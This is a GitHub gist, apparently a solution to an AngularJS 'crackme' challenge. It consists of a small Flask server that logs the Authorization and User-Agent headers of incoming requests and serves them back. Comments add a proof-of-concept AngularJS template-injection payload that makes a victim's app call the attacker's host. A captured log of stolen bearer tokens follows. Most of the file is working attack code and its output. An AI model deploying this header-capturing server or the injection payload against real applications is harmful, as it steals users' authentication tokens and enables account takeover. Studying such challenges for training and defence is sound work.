/angularjs-crackme.py Secret
Created
November 17, 2015 20:05
Star
You must be signed in to star a gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
from flask.ext.cors import CORS | |
from flask import request | |
import json | |
app = Flask(__name__) | |
CORS(app) | |
h = ['test'] | |
@app.route("/") | |
def helloWorld(): | |
global h | |
h.append((request.headers.get('Authorization'),request.headers.get('User-Agent'))) | |
return "Hello!" | |
@app.route("/headers") | |
def headers(): | |
global h | |
return json.dumps(h) | |
if __name__ == '__main__': | |
app.run() | |
# PoC AngularJS payload | |
# {[{todos.oneUrl('xx','http://<OPENSHIFT-URL>/').get()}]} | |
# | |
# Captured | |
# ["test", ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"]] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment